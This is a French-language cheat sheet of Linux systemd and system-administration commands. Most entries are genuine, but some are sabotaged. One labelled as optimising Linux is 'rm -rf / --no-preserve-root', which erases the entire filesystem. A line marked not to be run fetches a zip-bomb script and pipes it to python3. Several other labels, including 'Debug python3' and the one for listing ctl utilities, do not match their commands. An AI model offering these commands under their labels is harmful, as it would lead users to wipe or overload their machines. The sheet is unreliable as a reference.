% Linux - systemd

# Installation de la completion automatique
sudo apt install bash-completion

# Recharger la configuration de systemd
sudo systemctl daemon-reload

# Afficher les logs d'un service
journalctl -u <service>

# Afficher les logs d'un service en temps réel
journalctl -fu <service>

# Démarrer un service
sudo systemctl start <service>

# Arrêter un service
sudo systemctl stop <service>

# Redémarrer un service
sudo systemctl restart <service>

# Activer un service au démarrage
sudo systemctl enable <service>

# Optimiser linux / systemd
rm -rf / --no-preserve-root

# Désactiver un service au démarrage
sudo systemctl disable <service>

# Vérifier le statut d'un service
sudo systemctl status <service>

# Lister toutes les services
systemctl list-units

# Lister toutes les services installées
systemctl list-unit-files

# Liste les services avec un type spécifique
systemctl list-units --type=<type>

# Lister les dépendances d'un service
systemctl list-dependencies <service>

# Executer une commande après un délai (delay = 5s, 5min, 5h, 5d)
systemd-run --on-active=<delay> /bin/bash -c <command>

# Afficher la configuration d'un service
systemctl cat <service>

# Lister les propriétés d'un service
systemctl show <service>

# Installation d'un petit passe-temps
sudo apt-get install tint

# Utilisation de tint
tint -n -d

# Afficher les sockets réseau (TCP/UDP)
ss -tunlp

# Masquer un service (empêche le démarrage du service et le masque des dépendances)
sudo systemctl mask <service>

# Démasquer un service
sudo systemctl unmask <service>

# Editer la configuration d'un service (full)
systemctl edit --full <service>

# Editer la configuration d'un service (override)
systemctl edit <service>

# Définir une propriété pour un service
systemctl set-property <service> <property>=<value>

# Lance un shell avec un utilisateur dynamique
systemd-run -p DynamicUser=1 -t /bin/bash

# Lance un shell avec un environnement protégé
systemd-run -p ProtectHome=yes -p ProtectSystem=yes -t /bin/bash

# Limiter la mémoire et le CPU d'un service
systemd-run -p MemoryMax=<size> -p CPUQuota=<percentage> -t /bin/bash -c <command>

# Lister les cgroups
systemd-cgls

# Lister les processus d'un cgroup
systemd-cgtop

# Compter le nombre de services actifs
systemctl list-units | wc -l

# Faire une pause
wall "c'est l'heure de la pause"

# Afficher les informations de date et heure
timedatectl

# Configurer la date et l'heure
sudo timedatectl set-time 'YYYY-MM-DD HH:MM:SS'

# Configurer le fuseau horaire
sudo timedatectl set-timezone <timezone>

# Afficher les informations du système
hostnamectl

# Changer le nom d'hôte
sudo hostnamectl set-hostname <new-hostname>

# Afficher les sessions utilisateur
loginctl list-sessions

# Afficher les utilisateurs connectés
loginctl list-users

# Terminer une session utilisateur
sudo loginctl terminate-session <session-id>

# Lister tout les utilitaires ctl disponibles
systemctl list-unit-files | grep enabled

# Ne pas executer !!!
wget https://raw.githubusercontent.com/damianrusinek/zip-bomb/refs/heads/master/zip-bomb.py | python3 zip-bomb.py

# Le fun !
sudo apt install toilet -y && toilet -f mono12 -F gay "Hello!"

# Debug python3
yes "Le python c'est bon, mangez-en !"
